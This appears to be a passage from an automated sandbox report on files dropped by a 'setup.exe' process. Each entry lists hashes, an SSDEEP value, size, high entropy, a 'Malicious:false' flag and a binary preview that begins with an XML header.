              MD5:EDA7D650E8660967640F9CB9577A690C
              SHA1:FB5D6E99DCCD49956F6A61C8685D5BBB023CF04F
              SHA-256:A5D8A6628C2A62808995C9EC64FCBCF2E48850EA902F902574953DCFB2E30DAB
              SHA-512:0B7E3FB9CE7CF81FAAFC258DFB89DBDFF9608CC51F9206F25B13D18946512BC1B53FF5C007F3A783D57DD0330133568DFC1DB77D6C39F1AA64113956F5D50CCF
              Malicious:false
              Preview:<?xml....A.7Bf.\2.Q..\..9....C.]X...Nz.....tq.@9..../[..3.z...JV.n}.d.&.J.....+Vk.=z...nU..A....9a../..E5....Z......Z"z.._f.U..J..........$J..u9v.J...f_..O.6(5.)../L....~,.k.#.]0sC.W.......*c}O!.D.:..z.v...]..).M.Z..S.4l]*[.1I.......z.6.. ....w..M..z..}=....o.. .z.L.....P... w`..4..Iq..]ev..9?.tZ.......c....yn.. ...1.\......K.X.v...X..SQ.?5ip....w?.".....s.]..o....b<.{.dkI.`.9.....4.<g~.5I.@[....G..".....1.VP.I...v..m"..tY.".},YlR.lW..h.b.p8.hisrR@6v....=.....o...rt&5P..f..".#Us..d.9...0/~.Lb.p0....q.+Lp......T.U6.....x.8..c{.....h3}...d^."..u.F......(+/..B...?..k.S.W6Ur...%5...+...{.|v......u......tc..(.0...z..J4'...(4.^%............d...I.]....?...Lu.i.Po....SI'....q.........B|2.....]......".8..w.O...'.....;.o..o.Om.?..=v....].uc.7.A8...MH..}..2.!.}Z..1..9.....=..?.&mJjai.(.d..a...h.y..}....}.g..+......<..8.f...../-n..`....GI...;t+.......I.t{...3o..C.`}H.75+Z.2.....EY. ......j....F.. ......."t..M*..=....N.A..2.C.:..Z.....I..7....0.4.4<S.L.....v.)A.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1756
              Entropy (8bit):7.9037770079378955
              Encrypted:false
              SSDEEP:24:1CFXnrjbFUu4bKdn2qF4yMPCr+vM5DO75fhRarV+KFjC0xGpVyPq2VNeHKbD:1Cl6MxeN1M5DB+K1GpVcBDD
              MD5:C7F1E771ABFFC8154E290CBA6F18AA4B
              SHA1:EB909341E6C4C4D55DECB7880CE7F41706CB086A
              SHA-256:E7A0821F9BF54C82249C14EEDE054EFF561BAD6B7B62B1D4AAA2863399177543
              SHA-512:5EB8ABE998932BF9B16F99B59BD58B780A2616C20DA59DA00D3B8854724320672F10694C3AAD2E9C832C6076B56B08F4AA98848E0AB7EC5BC0E4519CB7535D2F
              Malicious:false
              Preview:<?xml.4P.Zj..GR..v....b~....TD.e....WsIh..Aq.`.......%..:...v...F.r.......ML.U..L..>..D.~......BV.%Me.w.,.f.$y3nk...4(.../.......`..a...d....y......Vu_357..O.92f.........E.,.)R..1.p..g.qL....w..{...).DPq.y..c.!.....:[..._...*u.Z...K....Am24..-'..f.....,DX..|..M..Q`!MK...............O..zm.t......AG..9.d=....JU..=z.......m..p.>.);.".....\.\]nA.d.FO.........'1........D.(|...d<.Qj...P..$.u<..I.T?.c"..d..T)T]....C6h.&...2...ap..V..d.T..._....Jx..P.....rS..pr..."a<.).v.2B.KsJ.k...O........&.A.....["a%..K..O....\7.9...O.b....eK.y..m....'..).\U0...K.e.rs..U^z.T.T.G..p...LI.[.t...40-..[J.....OL.u..y..F.2...?..........Z.b...2x.4..wR...+F..e....g...#=.A..641..w..\.Yv..."....5.1F....2.vd...-.....g...L...I..S\.DO...yx......t.m.2|.....s......d..e4..8.....^}t+..3Y....4....gC.I..y.....3..wu..'G#D......qO..-...Tmu:"...4ij..wt..ch....G.t.P......V..|}>.Zg.2..Q.M0..lK.dZe.......}.m.....5..D.9/.6C[=E..Uxp~~..|Fg...S...W..IR...>_@]C.e.ZaE.5.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.8854426204327766
              Encrypted:false
              SSDEEP:48:zQ06U87Dbhg06kf8Htv3Xz3V9GV2x2W8MBwCn1D:zgU87XJfwBXz3VIMxl8qw0N
              MD5:28C00994CE7BBF6B054A5A15CE87451F
              SHA1:37C8E4B1ABCE1780E5F2900EE84C8699AC4726CF
              SHA-256:846CE915FE8DE466E59829EF5B8B0AF0EC5BBAE1B933E79B7C293A84B4D5A703
              SHA-512:32F1D90EB23E92C2752AB018A95498A0ED9D539247C1355A783B06720B6F9C2346F5231A2E18736CB01C0A3480174315B59A540E1CDB831FFEA5CA3EA23516D0
              Malicious:false
              Preview:<?xml...hcAVz..p...z.+.M?4....{."U#.n...G.-......L.V.0.....x...;.."J_.1.W../J..`0Q..)B....Fo2.h."w.....!S..j...KH.|..8g[....J....'Mp.9n..'. .<...............!...o.dg."\;Socl.6......-....B..Q.y..".&..<x)W.K.hO...!g..../F|.iv......k.I...;........,=Wa.....T.b.\wl.....)R.Z......$*...n.9.y$.|.P..[3z...../pJac/>..t4....)..L.d.`.E..8......t...Go..\.+..f......q..c...o...x..g..n}.zc..um7..`r......1S=u....9.I...Xw..`.......3.4..,[....U..6=)..n.......<.18h..{c.........(.WE...._...k.nu......K3.....'....iK|/NM......Qy..c...Fe;x...X.|O...aC.[....Ajcav..}.4Sr.E@.v...Q.J.4.[.....^...M...h,..I!..t.-.TaK#..t.6G...G.&..Q.q\..C...i.W=}.W.u.D..S.q.....O`..b8..,M^(..W......9..u...(.......4_3.|S......t..G.G..R_...9.......rVz.M..,*....'o...OLv..YF..BO....P.Ug.1X....X#.l.T......b....+.9........5.[u.....k<8_-S..s..Q`[ J.n.........i.....V.....?.`.......\D.rY..`.s..vU..3~..g.!4...9c"nW..n..bZ.S....g)hpNzy./,'..m.%.c.Y.L.w&.tX....P#.4.*..M,......L...k.A
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.879925898100211
              Encrypted:false
              SSDEEP:48:xyuK41q2go7VB2Sitwc1PxZCJzWSy05tA1YgYr8V+D:xyS1zxAvwuPnCJzY0zuYn8VG
              MD5:7D8E54D36BC1D06281F303D21956C0C7
              SHA1:9A1058721F5A5B82E8A3B61EA6990EB4060C9F95
              SHA-256:B7A8DE807D3515600B52633C0E10EB0BBA7B0F8F8AA114C3225582FFF666CDA6
              SHA-512:5F13CC28D758A72B64E0F5044370E31255F0CE7291296FD022B5908ADEF67723CD73BE0576A42B26ADC15F02882FF5C026D700A5C91E26A77500CED0608FDAD5
              Malicious:false
              Preview:<?xml.,..tq[.P.y.CG..A......|t..v.$j....wb..U.Q.".h.wu......P..i.....'`-.89.m..8.[9..e..6.n..>Op..sc?.h.J..\X..!..xJ..en...J.P3K.@AR...9v...g.r....@~.3.l.<..X,.2..5.........3.\.n...5a..T.G-FLR .}..^7w.*..~._.8e.W.......c)2.~.y.G.ZW..P..].z...q.e.....8..b.Ue.<\3$i.oO.T.W).ee....@.'.f=:.k.v._...0G....b.LH...`;....mB.S.....J...c.L.=z.!..W...A.S3.:..%.Iw..I.......B.A.^...y|.? o.T...oR1....r"&N......K..}LF..(W..W:.g.....*....]S.C.F.v"\..49.#(...............\*.)..a...l...s7.r.j.jq_.Ts,X...b..T.......r.S.U%...LQ...... ...e..%..6..e.d....W.%.].2.q&.H......J..c.X....j.P...r-*.I...q .....c..5r.A...>.......}dD..J1r.........q1...[.&.j83,..7.1.,PPw....l..C..t).k*...u.b.~j.g.....he...rR...."W.......u25U..N...D0R..h.-$..W#..x?.........Y.D.2.\i .:.E.)*Cc.z..j.i....K...<..V.b..:...y.W...A\..3ud%`.N..!P.Xm.d...._.^1f0y.qu.*npl...%:.P......a...a..-....d...T3..B......rg.>..VU.{.,./....0]g.j:+..um.SI..R.\}.V.E=V.H@...H..".EA~}......o...sg.K.-.b.t:...1..n.gQl..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.869665389909448
              Encrypted:false
              SSDEEP:24:ovflJHHy8c460aXZVAq1wuqT5hJM1RgTQnOH7s54i9JYNb4PDIJUqu6bD:sJyO4YMwTthCU8OH724eJgmDIeq5D
              MD5:6284AD91AA2D942852C0D41B9432CD86
              SHA1:C41BBABC6E1D656CE4445A6885EC0BB193308CEB
              SHA-256:928EF50FE1B402FC3DE06D0AB980D8A352AF69D70952776774122F7D1E9D1478
              SHA-512:7268C32074A4492063C07955F812F98456D157A9461F5C89C7B9D15974F22FE5DFD881A0A01E60939282726315C3F9CCE60BEEA8C42074D9160F4EE59E4C96FC
              Malicious:false
              Preview:<?xmlU..l).z,3.vkF..S"B.{.:...g....z.Yn...VgC`...j...1Wkc.Pj.)...n...u.cH.e[U^.L...p.J5..Y6I.h..xa.....?.o...w.!....xa......h."...2...E6.\`..x......f.....3..:%C.~.x.'.....q`.cI.]...M..[....-D..g.............oo.s..9#B.:v0S}.S...b...[.....E.=....P3..U..!.....9...%J.x.x.....Sp*fR..w........o%.....E. ..v.y.F.....%.%.x&.T.90...xE..S...r..m`....Q>.IU..F/.T...1O...DB...R.r&#V.A,...3.>...a.}=~..kJ.....W....4.n}$m..............F.."X3.X.......m.D.....bUe....V,.......w...w^...hC.U._..3f.{..p....!..Q.8..HJ.....|.../.."?kA..QX^....j..g.a.H/.<*i.)..Q.....`.....IAH.....j..... ..K...8.n..T#...st..A.."..}....]...P@.RYS.s.g......{.be.....`...ed.....B).!j.=...$B..x5....#+xt.....:.d..-.u....F.....:........p...P....!......D..NV.d..C.\.Q...g.iUt..>..........Xn.o*#...p.3j\.?wY.m...H,.\.^z.b.....`........p..^@k....W..S.N.Y0.(.`....vL..M.."S>D.Iv..%.,4.oL........&...Z..#./..g.B.<.a....;....U.p.4.7...[..#^.-.4..k...-.....N\pEL....$.x1D.J...{.h[.h.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.890706607540031
              Encrypted:false
              SSDEEP:48:q1YpsKOKTUXFeOO7X2QNpikFhMqYdbo1buYD:vKS4eOO7X1HjhMbbS3
              MD5:1497E41DADF72E69241E1AD7A2F45C97
              SHA1:9A4D30B86B554A982E4DD453AF6B0FC3A19CEE3B
              SHA-256:9177D3BF86E54BA60E8EA6D5E132E4C7547B8AC61AEA56CCA370A830795A12A7
              SHA-512:0C98CD80A54A00A502AB2E0F36F451F704574752BB6F450A586E66DEFC20D3A896845F12AE117D05D4FFD7D1A8382C7F7795D823A8B4DCC25F4026FCCDDF4F5C
              Malicious:false
              Preview:<?xml.@;.v.e.....wPF'......g*......V'i..'{.3*...../.....E.vb....@..r:.r8.`&`..B?g..c.FFZO......3ROd..=.!"....D.^.X.. .VF........M..v....Wi...E.KB|..z.Q./`."9.f..K...h...[..,7..:..Tp...:A.-(t.D....N..r.y..[..C.L9'..'....bR.Sl.A....M...."./9.,jxoS.x.}H+..w%..#.....4G|ki......J.9...j..2C..9....x.=..?..... .7..^....\._..e.TU..`QNo....I2.8$..S.f.}4.21|B....l.WK.V..F.^....wi...=!..X.L....k..... ....o.[.....]s.4.......G.'.....5..(a1V.H ..~.....v.8...."B.o...^.>...:v.tL.GK.....".n.....I.Z.=.....'R.2.6P..\1ERB..8.Z.o8.pYWbn.aR@........E.N.../....R..T..Om ...=..".N...wFBY}.3.*....B^,/..mP..).........<w...9.Dr.(....v...9.W..zc}...Q...".m.A..y.V.mdh_.V]...n+..*.K......".l..#._k.De.m..5:.......UZ.`.;.XW;.sd....:.....@...W..Z....A.b.we..-6.${.Q.b..U.Hp$.&.X.M...X...j.......h...9..o.!.-..5(8....G....._i.W....B:.....^..$X.$....4.*z...#.nGK..^p..s..........O..?pu..... .N.._..(LI.'A.}.....T.z.K.&24..#x.'2....."Q.3....8.....[.4C<A.Z..3...?...Zt.5.x
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1704
              Entropy (8bit):7.878636230701065
              Encrypted:false
              SSDEEP:24:5fZubHL8sUpvg7v4P0vBoo5js5MZvmB6d/YIaLfRuW23RrLVbVyuOrY/NyAKbD:BZuLL0DPh8tmBWaFF2HgZk/kD
              MD5:2B8E892883352D0F0A4C144662B4C527
              SHA1:985229AE6E00A5BB054124CE63F452A4EA3BBA4B
              SHA-256:F8886405486C4B922A8F1586558F9FF7EE6FBEC38BACF6B68D781F1B829D38B1
              SHA-512:63F794C4E853145F966A271F2B453F57680703B85870CD600FC6531628BEF16D1445A1E83136C6EFCD8C5983DDD1876269DEF03E7FBEAFAE89EA58A883D90F21
              Malicious:false
              Preview:<?xml.'C..'.bX....?..k..N.Fr..B..J@.y....Q^....7...'..qx..3-.....z...^%.F....Q.Q]..i..:...(...L..X.I^t.. .....L2.U ..m..Zm...g.b..._..E.k..7b.v.`...^..w...)..p...?o7....BC...@..e....:..:.Oj.=..j......'D. .q.jP..R/qnu....;AH..I\C...6.]\J^4...........z(...j.../`.s..BH...:...T,.....H.C.s..]..$,H...T.Ck....Z.......@k...%X.<rG...%...v........^1.I.L..b+..H........2t0....bO-Kv...G.8...T......(...{y..0.U/b*...{4i.\...?'h.....XUDse.E~...........5.R.-.Y.s.]|..l...m...........B@...b....g..= p......[......0u_..H.....V....k.&*.N._.........~.-}...e.n.Bh......i.<.`.B.\./.I...4..V..[tn.S.6..m.'.q7.....;...>?n].&..N.#"o.:%.!Z....K.L.^-.zMdN...~v...{.v..w......z...../.G.C.!.V>....W..fcF..H...8..L......J..p... ..(5.....k..P..)..i..;..<,..%..Q:g..hy. .......^>...\...o.K.......{.Bz.lv.?.G.L.=.n.%.=V.;..(.Na.<k.IJ>ZB..K..Ezh^gF.............._n..!=.r3A..w.b...4........&......D/'..EB.....^.o..U..a.._..V..C..m....W......^&.._.,.c.C........'j;V.W..........m.....IQ.w..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1741
              Entropy (8bit):7.866002639709599
              Encrypted:false
              SSDEEP:24:zSyFFmRXy0tDx5ujwASFv51GxdVv9/mrlgs6G3bWs6IjWCkPxhDI81lFywKR2FH+:GYFuXFFRM11GK3IyZLtRwQFEtPiNzAD
              MD5:52F34FEAA1B34F357E36772365755251
              SHA1:32A27821EE8158D1A15385DA0B3B9BB9916B1296
              SHA-256:792A11B481C9C4FE84B0F00760DCCBEFDE4BD356EB3BAD40653D6E8622D34C52
              SHA-512:0DCB05A29F543876A264ED511D61928B2F66E11D9EA1CE532739C8FC788730C625031A4EBC8B61BAAE812E3CF7288DA40B4F465C42C88BBC0D17E5AFC773B614
              Malicious:false
              Preview:<?xml_.o7...n..{..t7_<...qs..L...oBv.vL........uV.`....]...V...7p......H=.\D..!\.g..1.c...jP(.9E..F...I..h ...6...IaS4.v.$...7n&.l..I.e.e...{.:G"52(.~...C....Ww....F.g....t.N......h.)..v...gTEAHa../..'.'....>........^..-.fFQ).Ld...J...a,.......i....g.O..........&......&..n$.B..!..C.A...*U$.....`bktu}w.M......7.'.*.g..n......7e...[(.y.963Uv........D.T.....5...).=.'.h.T.X:...H..g>..S%..K3.2.G.d*....|.}.j...eU....k.u,...,1Q]..+'.f..q_Y...... {...v.....X*W....`.t..v....<..S.7O.......j:...@I....LO..#...E.....E...B..~.7...P.w...$F.K...J...........e.U5_8..0..cA..E....!m._p.s.Z.-....p..N...O...'.{Z.Y..+........~.A.......pT...j.I...F..G.i.d0%U].+/x....(t...H. .&......l..H..H..........H.D...'.^$kSTg*...J.p....aT..~...m...}.[..?.....W.......d-.......k.s7.j8F.Y,.t..b..#I..k.L7.......V...4k.....P...@...nt.=.T....z&vHB..Sl.z[O.)A.a...?.....eI....s.Q.9.V.wJ.M.v5.L..@W.....]7B.Z_.D...D..D.).cC...Qjz;/:$.P.`.G0...Rl.0T.P....D...... ..gug0P..G.........O1
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1703
              Entropy (8bit):7.881654063507157
              Encrypted:false
              SSDEEP:24:TyyvkAyytmRBS8HovVG9Sq4Epdiqrnp6SM3jc4vOi2CZr/+kM9RzMhfbD:xvntmW8HodG9UEyqrnFMwsOh2/7MgD
              MD5:AC49DFAA906A4A77005F8A236F4B48C9
              SHA1:B1B083F8B1B9E7960ABE79132AA93D874D7E7BB4
              SHA-256:27D5C74BF61C29AB4C74F6AD0428A68D44D54D9673B6A3EEAAAE4C5E65B26695
              SHA-512:39D9AD5172CDC316FD08B2E5C0D81ACCE5DE370C5D897C2CD3609CE52CAB398EA136B4C914B2E50108D6E8302339D9D9695067C3D08089F075948A335433218B
              Malicious:false
              Preview:<?xml+=3.n.0Rv.\...6.......C...|.}|~.8.o6.R....).......................T.G.r.._b^.I..7.]..)...g.....:.t,..T...V....*.../..p.....l.DY.8t.u.....)...=.J..C(z.......(O7..r.g.S=..5....`.R.}...WFaCA.. .....vE..4.4....`fb....r.\......;N...>.<...:...B.!Q..%....+..g.....h.Z<..W_..3]......(~,.G..'....Z..\.|.f.$F:...iE......*.f1.4.&..E...&.......3...r.Q@..x.i....b.^a.`$...O"...N..}HI...S@B.4%.B..{\...!5........!|+.....).g3@J./.$..rN....'.N..Y+..g+K.}..HTh.Bxpb.T.1....t.q..c........v.X[.Y.jk!.eZ..U.,h....K#.;NOJp.=d...l.9.#.(..l-p.N(U...N.._.R.+...Za..(.F...L.ud.cD;I..8..%..].`rz.*e...P@!.^.,..w.hV>.E.....L.-...Af.C..7..W.nx..W.........y..*.?.=...F..&./..p....3...U..\........^..)-~.7..2B.....zKH[T..j"J..l.!....ry...<D..R.[.!z!....J......Wd.D>.e..a...........%.*.......].XJ...4|..KY...C.W..[..3.@..$.8...1E]M.M..p.g..>^.y..B.m...%.1.7.)....A...GQ.M.h*-...M.ED?..a...t....U!.]?..z..d.sI..R.&..F........R.1N....Qg..q......".0.g.../o%..>%.h......|u
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1740
              Entropy (8bit):7.890433075324015
              Encrypted:false
              SSDEEP:24:5SaN9j+rqHej4oKAxJ2X2qogHZHj8oTwjtaxbUGUceI8G+kOLG/4N0ToS2c01bD:5tBKTKk7gHZj8oeEMI7wGIcUD
              MD5:AFCA266812796159965E2980D7557341
              SHA1:7B18B49C651E61A22D2C65D0DA5EFC18E59172C8
              SHA-256:A4FA8F5D3BC3804CD09B0755BA1E8842D641D90C17CD7956706B126E56B8F6AC
              SHA-512:094180562661C08FB0FE4FAC37573FB66B7AECAA6E12403A5F69C347D39C9B40A889F7A873B77CFBC5B8E71118B70E8F4F1AAE6D97BD994CB2DD86CDA91935FC
              Malicious:false
              Preview:<?xml.V..D.............g....F....i,....x......j.Y.a...z......O.l*"p.....b3*..m.?..@S..`*.A............g%u7..m.U.. ..k.I...%4.....K..W.."....u..~...|94....XIF.86.#..;.QUnwD...8..H....8Wj6.P..ex.d../.L.......'..}...g..H..r2..lg.W....`....hp.F.5.".\.E.F..cC.pW..c.#j.P..z...l..w..]....Z.....d[=3....f7.....3.:...k..d.\\.>}.zL..}`.O@.._..{.c.:0h...........Zb......j....Y.I...L.....Hs....>.....|..!...J5......)...z..I..C.M;+23.%.Qo....G..r .....E..Q.-......T.cDRhkoM.%T.}.D4...Y..&}.{#..6.X....^A.!..-.......F<>"b.S2.6...nO.H.4...<..4..#....fi44.GX.F.<w...K....Ny.7..9......-DVT..1..D.Q...+..P....Y..j.c..({..........V@$._." @].....l).Oc]...4...+9....}.r'%to.&..|Y..........O.=...i.^.8..92yq...4.}..o..2.a{....Q.?.$....}.~%A...^....x.9..s.#d<. v...lK..6.P.<J...{...).jm........q.B.!.........*=. }..../m....q.....3..I5..>.TV...Nk`...H.z........*..q...`6.f.S.J.A.b....g.....)o*.1*3ue.2..H+C.?..E.@/*..7.!..?..(..Sd0g...{.>.}.W9.%....V.guy.....\Jq.*.=...t;..\.>.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1713
              Entropy (8bit):7.898790892228492
              Encrypted:false
              SSDEEP:24:LbToOasLp3cGt6jea5N4znDndEaHjjCw6Xlz5yU6QdkiF3ugbHwtl+iOnJvkIvzo:f/NLTEemN4zDndLCVl37FF+g7HSxONED
              MD5:2004E36ED71A2D60F74834A22D969FD7
              SHA1:F6BEBA44822F28DE6F847F4EA883D208CCE94987
              SHA-256:3BE98BC6F38416C3411A4E6903B0F03EC9DBFC2FC7059B325C3BB9E0A825ADCF
              SHA-512:5DB4426FB21A6300279DE35E3F293644C1F8D68F5C8598F1B7D23D5C0443D2716E474193EB2D05AFDA8A3EAFF0EC26EC717B949DE008858D25866C2C506D1A31
              Malicious:false
              Preview:<?xmlWs.|.>.H...d..j\..1xi?>;.%k3x.....aVU.|5.........v.P0...!..p......~........q.D.^..*.dD.H.2........U.\d.....D..6.........1..J.Keh*...UD9y..)6.H..^T@V..r^..qd...`.......CA...LP..}..u.!^.....3w..0Q).\8...az..Y..`./.G...'.._...a9c..f1.I.G..HB.F..t..n....E0.7.).cJ..gT;d.V.@. ..h....T.......4(&.....Hd..J.p. .`C.h./.=.A&,L..f.V....:.p#.-.[DE...+.^m..Z:.Q\..W..WN=..I^y...$.....G+.J.JZ.e..5K.*;%](.l.(..z.........@_..vA.s.SG...E..E"x.# ...N6...o.5..*0.rB..p*Ly..z...E.$.k..&c.G....{^..n8...O{.DI...e.....*.2."O...}..NA-9o.i.te.w....5.....\C.%.Y....j.p.$f...t........B>i..;.".]u@.........n....'.'.....6.P.;.gJJb.o.'..~xM...PW-....<...[g..$..\...(.~.b.ZY..p.NP.....pc.....-7r..|...-..G./._S`....=.hF[.{xi=.#.\bJ..0...p...+...5~....qM...=<q..j....g.......c...g.<.S...$.S.....U...P......1zOj.No.&...a...#...>.`....?....?&......A_*....v..>.........S._..r.jr.k....B.d.Sv.0..b.LW.|....Z/.....F f......jF6.{..W.6...E ..~....W_C..B..S....L...].>.o..Z....P..;
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1750
              Entropy (8bit):7.874957337684627
              Encrypted:false
              SSDEEP:48:xWl7FzlhSf/70g2YOb0IUZ/4nM3aWdjTFkUwIjt4VBTopltaMNJSjkED:Y7zGOb0IUZXPKnIyBUpltl0L
              MD5:8A32CA111ED0C8506D7DA07A42508333
              SHA1:7A11DB67121570B7320376217FEC1B337FDCE5B4
              SHA-256:471155CF37267D8798A590D8A51CCB1135AD5755598302AA9669278BF457D8EA
              SHA-512:27E451EDEE13FD940EB4B72CD5FEB21A54FB6DA525AA20A920260F4B2AE1CF487FD8D6C4429731F23B62AE1E2593608D4DA17FFC76F7882B03CC67AD289ADA4E
              Malicious:false
              Preview:<?xml.&*O.o.R....b./y.f.%D.....^...9s......A.4....=.9...,..bk........Vt..5..]....<M..;.*.._...gu)..@....*.pI!..E.Y...T.OPO..{.,...o.p..`.+.kF%m<...5.%;:._....+....6cs.^.H.....`....Z;k.k...'...G..y.N.Xn0TO.r!s.7.../.n....l.,.......Hg@.....A..O...H....=.gn..sg&...:.e.7B.1.....7.{......'......0....-....'...A.....u.S0...ti......@...e..jA......k......D....j........s.H&'.]..s9\ZO..b._..^T.h[Dtc. .Z.~.....Z%.G..[t:.P..ObH...q......z..t}...#2...TenA..g....r/k...J.r.7'}......k..j...;...O.@Y..N..l.....".n.x.\....J."1Es..k....|..k......fd.>C...^.!.....'<.....5.>..(W..x.yn@W`..._......D..<....B3.B....A;..m..:S.%.T.d..6..!.H..ih...@.........o..Eo.....?.\=sE.>K..).u.eM..=.3M..[3k1.AX!..<.Eb..s......w...x.....f.:....K.EN...a.^...e...z...gr}.J-....U.G.......1..i.|W....Z.......L...4<j.Y...%.Jf..(.N.Y..<.A{R^slx.+i..fJ...Q.51.!V.5G..mKJ6k.RJW.............7.%Hs.+...\.....^$.*.Q.kP.X..(.~...u....5m..aX.r...Bp.n*...!bt.{...@)......1...^.!-z....u..LZ.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.877685589044706
              Encrypted:false
              SSDEEP:48:qOWBovu9QUcEgiqEcnQWKSzEBn+MHKMPxsnVE+G/JKTD:q1BOUHgi94KSoBvHKMZsnWX/Jc
              MD5:D85E47D7197DE1AFA320F9D7DF83E41C
              SHA1:71CA5EFFE11D11A17F868CF0C0FB8A79D8D9ABDC
              SHA-256:0A2DAA92B95FCE56E43EDF90108B494F5592E6575D0D527DE31C824F73F5CF3E
              SHA-512:E711F557F216AC5ECCDF634247CAC47BE59895FDAA198FE05D3FE69D6DA9D82065EAFF6214AB370EC30B1E3EAA0F303006A36E6A4AAA4FA72943222657739E22
              Malicious:false
              Preview:<?xml.1...y......2V..r*..1..9 .$8.`....3O...U.....I..R%.)..x....&..*.8.4.f.!.v..)..bam.5.y5j!....-.>...F..z.<.%..g.....Q.^W..6)q..*(x..q...!d.o..;...p..w".Q....Y...o...z.....Hc...At....i^.5.}O...*.=.HO.zq.su.g.x.>.........k^...um.....l.^..Q.?.W.V..+.H'._{...1..@...&X;~3.8V'.oC..S....T..J"...|*..&J.B=#...t....(\.....XI....DOZ.F.)...+..KD8}..6\......%u....^...A.....$YV.\@9.:.~....=..e..|c./$... ..m..1...qF.).Ie2c7..!..t..4@...d.P.D...sHfMo..po.m...f......9?......i.=...FA..H.q...7N.%.[......uAm}..Z.....{l6.3_....b\.rIC...s.EDY.b+F....2.2f^D0.z.M.b.#D....im.Q.Q.r;.q......w.....F..{.....k..`^...L0....G.k..f.!..&..w....Q./\DY.F.........$.rX<...^I.?.V....!......4D.....~U..e..|.^...R...F...(.....j...M.....c.i.(.R.r...z.......t.!...: .`\..v..*..q..a.xj..Y>..9..=.. 7.Ja2.......v.X........a.F..:.)1.'..N+..'..l.*#.&,cUo.)..D.4. .....x..".q,g.Bj.....>.m]...D.$......4...[.*....<8. z.......... ....R.V.?....*H....,...'.....l_>.P.Un..QN.:..my!.lFT,.F.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.899843178776511
              Encrypted:false
              SSDEEP:48:t3a5RWlbFTLIIovLHodsEFnp38WHSBDBG1D:t3URWllMIoDodTpMWGC
              MD5:ED9597708BBDBB87E61344BBA65895A2
              SHA1:4960C4FB087943D0ABCA68696026FFBC9E29F324
              SHA-256:30E3E4A72A100E6E9D46E0F96917539274AB844124414C031FD12E2204770D05
              SHA-512:D3DD7DEDF6609379166EEA91D3A75FDC26DA7F2EAF3F6F9B90F7269A2FB3E9865B7FBFE50EB663A6DA0FCF6A9798005435A7D6E40454C868B29330A2F8AB1B38
              Malicious:false
              Preview:<?xml2..Q.f)...G.O.....L..T...9....UH..Y.*...]......*).Y..9.wG=.'.!.......d..Vv+..+2.@....~..K...<Y4.j."/........?.m..YO..0Cj.......,.t........]b:^M .WY.x..~{.J...1.........W....|.3...#.>.a;&..........h].C...X.#.j.J.(....J.y.)....P.p..Jw.a.g1.._...t..~.....6....YH.....cT+:.S....I\*...QIJV....l8..K.#..etk.y9t.=.w...t...!.Ec{[1..R.9.(..CA....^@v..3y',....j?m!.n.w3M...*..VO.k.a.....vJ.#.DOk.w..S.8....f.9.5?......+*7p.*..3ox.:....blfcxR.?.-.p...OH....P.,...t...qt...d.+..1.>.F....[.k.W..c.$6.%>...^I>4..nC..^3.R..:....t3.+."J...pR..Ny..............L.......C.......<.]Y..........6.........TL...f...Hv.p....}.........@.q...!N.....U..0...=....(+3.s....U...R....U..=2....j.L..PP BIU%............t-NO.x%N.^...!?.....l..........'..&....v.....1.p$..........>....Wz.e.:...O.\6p..A..O<.0%...f.t. ,.Ci:K.~..F.x..K:&b...K....P.k...D. (.#.aw..u..|.&.K.j.eml...gY.\.....V..x..c.w.....x4..\.;.: 5..a#.".w3.L..}.7.<..b..S..H.\^T.../*.rA.h.......R..A..I=.I]...F).0..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.881928742636453
              Encrypted:false
              SSDEEP:48:NpIypA/XsLMNP5aaeLX+d5x1bDqmZpmUwb+ctLj26AYND:PH08oIKd5HbDbZIUwb+e
              MD5:670307A03316E0D974A3FF743C84EC7E
              SHA1:F8AF3E5213FB1AEB2166966ED41FAC4B890890FF
              SHA-256:4D5F6C3BC20C4E66324303B02EDE1BB994B55771C05F3EDE31EB51BAAEC856C0
              SHA-512:72D634758C1C397D0CF1EB6EC5AB29E942E19FC1CA89AAAC47DEE6653730B8065DD6036CB6FED6978485A953517D6409D8DF0972DC2AA26356CD4A6847DEB35F
              Malicious:false
              Preview:<?xmlk..(....g....WH.L@.\....!H...lz....m....-...0.P......E.E..y.h.L...*}......K..>....S....Z....M_~g.%.T.4.x.m.6.x../.j.w.Fg....|^....@U.J.qk.S.$....M.......IlD-x...g....U.x-.+.d..?LYGx..)G..\..u...R....$@Z..q).\Tbv......y......&.8..I...."............."...?p.^z....R.^......a?.....J.`../..kp..B\..IO...(}...`.h..m .O wz.k.u..X.G..|...I\N.t..y.\T'....k.>...Z.?...6\..g.<RD.+.@..j<.......s0z:n..]ut9.Q.&.$q..O&..IP...U.........c..Wt0D....I..;.....r....fU.D..3...F*.....[l...'......Y.Q>C.#..`>._......G 